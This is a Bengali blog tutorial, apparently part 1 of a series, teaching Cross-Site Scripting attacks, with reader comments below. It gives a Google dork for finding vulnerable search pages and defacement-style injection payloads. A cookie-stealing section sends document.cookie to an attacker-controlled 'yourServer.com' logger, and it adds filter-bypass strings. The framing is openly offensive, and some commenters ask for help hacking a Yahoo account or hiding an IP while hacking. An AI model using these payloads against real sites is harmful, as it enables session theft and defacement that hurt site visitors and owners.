!i!i XSS এর একটি সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল !i!i পর্ব- ১

32
3667
!i!i XSS এর একটি সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল !i!i পর্ব- ১

অনির্বাচিত টিউনার™

®╔═════════════════════ஜ۩۞۩ஜ══════════════════════╗®
✪░░▒▓███►✂✂((((☠☠➸Uη§є₤є©†єd✖Ŧwєє†єЯ™➸☠☠))))✂✂◄███▓▒░░✪ ®╚═════════════════════ஜ۩۞۩ஜ══════════════════════╝®

The Ultimate Path of The Bangla Technology
অ আ ক খ প্রযুক্তি এখন আমার ভাষায়
!i!i XSS এর একটি সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল !i!i পর্ব- ১

আসসালামু আলাইকুম, সবাইকে আবারও আজকের পোষ্টে স্বাগতম। কেমন আছেন সবাই? আশা করি সবাই মহান সৃষ্টিকর্তার অশেষ রহমতে খুবই ভাল আছেন। আজ অনেক দিন পর হ্যাকিং এর একটি টিউটোরিয়াল নিয়ে হাজির হলাম। এবার হ্যাকিংয়ের যে ম্যাথড দেখাব সেটার নাম হল XSS বা Cross Site Scripting. এই টিউটোরিয়ালে আশা করি আপনাদের পুরাপুরি এই ম্যাথডের উপর শিখাতে চেষ্টা করব। টিউনারপেজ হ্যাকিং ক্লাসের ব্যবস্থা করবে বলেছিল। কিন্তু টিজে পুদিনা পাতা ভাই সময় না পাওয়ার কারণে এখনও শুরু হয় নি। তাই মাঝে মাঝে আপনাদের জন্য কিছু লিখি হ্যাকিংয়ের উপর। তাহলে চলুন মূল পোষ্টে…

হ্যাকিং নিয়ে ধারাবাহিক পর্বগুলো দেখেনঃ

!i!i XSS এর একটি সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল !i!i পর্ব- ১

কি কি শিখব এই টিউটোরিয়ালেঃ

  • XSS কি?
  • কিভাবে XSS Vulnerabilities খুঁজে বের করব?
  • XSS প্রাথমিক আলোচনা
  • ভিকটিম মারা পদ্ধতি
  • Cookie চুরি করার পদ্ধতি
  • Filtration Bypassing

XSS কি?

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

এটি নিয়ে কাজ করার আগে প্রথমেই জানতে XSS টা কি? XSS একটি সংক্ষিপ্ত শব্দ, এর পূর্ণরূপ হল Cross Site Scripting. এটি application-layer web attacks এর সবচেয়ে জনপ্রিয় একটি ম্যাথড।  সাধারণত বিভিন্ন বড় বড় সাইট হ্যাকিং করতে এই ম্যাথডটি সবচেয়ে বেশি ব্যবহৃত হয়। একটি ওয়েবসাইটের নিরাপত্তা ভাঙ্গার এটিই হল সবচেয়ে ভাল পদ্ধতি।

XSS attack দিয়ে একজন হ্যাকার তার ভিকটিমের ক্লায়েন্ট সাইড স্ক্রিপ্টের আসল ওয়েব পেজ সংক্রমিত করে। যখন একজন ভিজিটর আপনার ওয়েবসাইট ভিজিট করে, তখন script টি স্বয়ংক্রিয়ভাবে ভিজিটরের ব্রাউজারে ডাউনলোড হয়। নিচের ছবিটি দেখুন…

XSS attact দিয়ে একজন হ্যাকার ওয়েবসাইটে  malicous code বসাতে পারে। এখন আমরা মূল টিউটোরিয়াল শুরু করব। চলুন প্রথমে XSS Vulnerabilities খুঁজে বের করি।

XSS Vulnerabilities খুঁজে বের করা

একটি ওয়েবসাইটের vulnerabilities খুঁজে বের করার জন্য আপনি সহযোগিতা নিতে পারেন Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s ও অন্যান্য যে কোন কিছুর। এছাড়াও আপনি Google Dorks দিয়েও আপনি ওয়েবসাইটের ভ্যলু বের করে নিতে পারেন। আর যদি আপনি ক্র্যাকিং করতে না পারেন, তাহলে গুগলে যান ও নিচের ডকটি লিখে এন্টার করুন।

inurl:"search.php?q="

তাহলে আপনি অনেক গুলো ফলাফল পেয়ে যাবেন।

XSS প্রাথমিক আলোচনা

XSS এর বেসিক জিনিসগুলো জানতে প্রথমে একটি ছবি দেখতে হবে। নিচের ছবিটি দেখুন…

!i!i XSS এর একটি সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল !i!i পর্ব- ১

Xss injection এ সবচেয়ে বেশি যে কোডটি ব্যবহৃত হয়, সেটা হল

<script>alert("XSS")</script>
আপনি ভিকটিমের সাইটটি যদি vulnerable  হল, তাহলে এই কোডটি দেয়ার পর একটি পপ-আপ মেনু আসবে। যদি কাজ হয়ে যায়, তাহলে আপনি আরও যুক্ত করতে পারবেন। দেখুন…
<script>alert("TunerPage.Com Hacked by TJ Unselected")</script>
যাই হোক, আমি আপনাদের প্রথমে বলেছিলাম যে, ক্র্যাকিং করতে না পারলে গুগল ডক ব্যবহার করার জন্য। তাই আমরা নিচের ডকটি ব্যবহার করব ভ্যালু বের করার জন্য।
search.php?q= 
যদি আপনি কোন সাইট পান ভ্যালুএবল, তাহলে নিচের কোডটি প্রবেশ করান। ধরি, আপনি www.site.com এটির vulnerable পেয়েছেন। তাহলে টাইপ করুন
www.site.com/search.php?q=<script>alert("TunerPage.Com Hacked by TJ Unselected")</script>
তাহলে নিচের মতো একটি পপ-আপ মেনু আসবে।
!i!i XSS এর একটি সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল !i!i পর্ব- ১
এটি সব সময়ই কাজ করে কিন্তু মাঝে মাঝে এটি কাজ করতে চায় না। তখন বসে বসে কাঁদবেন না, আরেকটি পথ দেখাব :P আপনি injecting HTMl দিতে চেষ্টা করতে পারেন।  ;) তাহলে নিচের HTML কোডটি প্রবেশ করান।
<h1>anything you want</h1> <br><br><b><u>any thing you want</u></b>
তাহলে আমার লিংক হবে
www.site.com/search.php?q= <h1>TunerPage.Com Hacked by TJ Unselected</h1>
www.site.com/search.php?q=<br><br><b><u>TunerPage.Com Hacked by TJ Unselected</u></b>
এক্ষেত্রে আপনি আপনি যদি এখানে Bold লেখা দেখেন,তাহলে বুঝবেন এটা ভ্যালুয়েবল।
!i!i XSS এর একটি সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল !i!i পর্ব- ১

ভিকটিম মারা পদ্ধতি

আশা করি আপনারা এখন XSS এর কাজ করার পদ্ধতি সম্পর্কে মোটামুটি ধারণা  পেয়েছেন। এখন আমি এর উপর কয়েকটি জনপ্রিয় ম্যাথড দেখাব। আশা করি আপনারাও পারবেন।
<html><body><IMG SRC="http://site.com/TJUnselected.png"></body></html>
এছাড়াও আপনি আরেকটি কাজ করতে পারবেন IMG SCR এটা হল তাদের জন্য যারা HTML জানেন না তাদের জন্য। IMG SCR হল একটি ট্যাগ, এখানে দেয়া ছবিটি লিংক ওয়েবপেজে দেখাবে। এখন আমরা Shoutbox, Comment box বা যে কোন কিছু খুঁজে পেলাম। যা আপনার সাবমিট করা ডাটাটি ওয়েবপেইজে দেখাবে। তবে এটা করলে আপনার ওয়েবপেজে শুধু মাত্র ছবির লিংকটি দেখাবে।
<IMG SRC=""http://site.com/TJUnselected.png">
তবে এটা করলে আপনার দেয়া ছবিটি ওয়েবপেজে বড় দেখাবে। এছাড়া আরেকটি ম্যাথড হল FLASH ভিডিও।
<EMBED SRC="http://site.com/TJUnselected.swf"
এবার একটি পপ-আপ দিন
<script>window.open( "http://www.tunerpage.com" )</script>

Cookie চুরি করার পদ্ধতি

এটা XSS এর একটি ভাল জিনিস। প্রথমে আপনাকে একটি cookie stealer নিতে হবে। এর জন্য এখানে যান। এবার এটি কে সেভ করুন। আপনি একটি .php ফাইল খুঁজে পাবেন। এটি একটি ওয়েব সার্ভারে আপলোড করুন। এবং মনে রাখবেন অবশ্যই ‘log.txt’ নামে একটি ফাইল তৈরি করবেন ও একে 777 এ chmod করুন। chmod  সম্পর্কে আপনাদের আরেকটি পোষ্টে ভাল করে বুঝিয়ে দিব। যাক এটা না করেই কাজটা করে ফেলুন। তবে বলেই রাখি chmod  হল একটি Unix command যা আপনাকে একটি সিস্টেমের প্রবেশাধিকার সম্পর্কে জানাবে। এবার একটি XSS vulnerable website খুঁজে বের করুন। পাওয়া গেলে আপনি এখন আপনার কোডটি প্রবেশ করাবেন।

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

অথবা

document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

এবার যখনই ভিজিটর রা আপনার সাইটটি ভিজিট করবে তখনই এটি তাদের কুকিগুলো চুরি করে রেখে দিবে। এখন আমরা কুকি নিয়ে নিব।

http://site.com/search.php?q=document.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie

 Filteration Bypassing

আপনি এমন অনেকগুলো সাইট পাবেন যেগুলো vulnerable কিন্তু সেখানে কোড কাজ করে না। তখন কি করবেন? এই জন্যই এই অংশটি। bypass filteration এর কয়েকটি ম্যাথড দেখুন

')alert('xss');

অথবা

");alert('xss');

উপরে যেকোন একটা কোড দিয়ে আপনি vulnerable server থেকে যে কোন কিছু পেতে পারেন। তবে আপনি আপনার ডাটা সাবমিট করা  আগে hexing or base64 encoding  করে নিতে পারেন। bypass filteration এর আরও অন্যান্য কয়েকটি পথ।

<script type=text/javascript>alert("saurav")</script>
<script>alert("saurav")</script>;
<script>alert("saurav");</script>
<script>alert("/saurav"/)</script>

Happy Hacking

আশা করি হ্যাকিংয়ের অপব্যবহার করবেন না। এটি জেনে রাখুন যাতে হ্যাকিংয়ের শিকার না হন।

সবাইকে অনেক অনেক ধন্যবাদ। ভাল থাকবেন, আল্লাহ হাফেজ।

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

32 মন্তব্য

  1. salam all my frds
    amar akto help dor kar. kew ke parben akto help korte plz
    amar ak jon valo hacker ar number or email id dorkar
    amar akta yahoo id hack kore dite hobe.
    jodi kew paran plz amake akto bolben. akto reply kore janaben 10x to all

  2. উরে বাবা কত্ত কঠিন। আমাদের মত ছোটদের জন্য সিম্পল কোনো উপায় নেই আপু?

  3. ভাইয়া আমার Gmail এর একটা ID কে যেন হক করে ফেলছে, এখন ভাইয়া আমার ঐ ইমেল অনেক দরকার ,
    ভাইয়া ঐ গ্মাইল আমার অনেক দরকারি জিনিস পত্র আছে ভাইয়া আমি এখন কি করব, প্লিজ ভাইয়া আমাকে সাহায্য করেন
    এবং ভাইয়া আমার কাছে অন্য জনের documents রাখা আছে,
    প্লিজ ভাইয়া আমাকে হেল্প করেন,

    ভাইয়া যত দ্রুত সম্বব আমাকে জানাবেন, তানাহলে সব কিছু শেষ হয়ে যাবে।

  4. ও রে বাবা , আপনি তো ডেঞ্জারাস। আমার তো মাথার উপর দিয়ে বেরিয়ে গেল। কারন কম্পিউটার সম্বন্ধে আমার খুবই সামান্য ধারনা আছে। তবে আপনাকে বন্ধু ভেবেই বলছি, যদি কোন দিন আমার মেইল হ্যাক হয় তবে আপনার কাছে সাহায্য চাইব কিন্তু :) :)

  5. একটা ভিডিও দিলে আমার জন্নে ভালো হতো । একটু দেখেন তো ভাই ভিডিও ফাইল দেওয়া জায় না কি ।

  6. ভাইয়া, যদি আপনার সময় হয় তাহলে কিভাবে হ্যাকিং এর সময় নিজেকে সঠিক ভাবে লুকাব, বা সঠিক ভাবে ম্যাক/আইপি বদলাবো তা নিয়ে একটা মেগা টিউন লিখেন। আপনি আশা করি বুঝতে পারছেন আমি কি বলতে চাইছি।

    • এই বিষয় নিয়ে টিউনারপেজে অনেকগুলো পোষ্ট আছে। তবে হ্যাকিং করতে আপনার হ্যাকারদের জন্য সবচেয়ে ভাল ব্রাউজার হল “মান্ত্রা” খুবই চমৎকার একটি ব্রাউজার। এটা নিয়েও পোষ্ট আছে। দেখি মান্ত্রা নিয়ে একটা টিউটোরিয়াল লিখতে পারি কি না।
      আপনাকে অনেক ধন্যবাদ মন্তব্যের জন্য।

      • ধন্যবাদ ভাই। ১ কেজি ধইন্না পাতা দিলাম আপনাকে।

  7. আর মাত্র কয়েকটা পোস্ট। তারপর আপনি হবেন টিউনারপেজের সর্বকালের টপ ১০ টেক-জকির লিস্টে প্রথম। টপ এর টপ। আলাদা আয়োজন ও খাওয়াদাওয়ার ব্যবস্থা রাখতে হবে কিন্তু….

    • না। পোষ্ট করতে আর মন চায় না। কত হয়েছে? দেখতেছি… ৪২৫টি পোষ্ট হল। আপনারা লিখতে থাকুন। আর পিপি ভাইকে ক্রস করে উপরে উঠতে মন চাইছে না। তবুও দেখা যাক……………
      সমস্যা নাই পার্টি সামনে একটা দিব :)

একটি উত্তর ত্যাগ

Please enter your comment!
Please enter your name here

fifteen + 19 =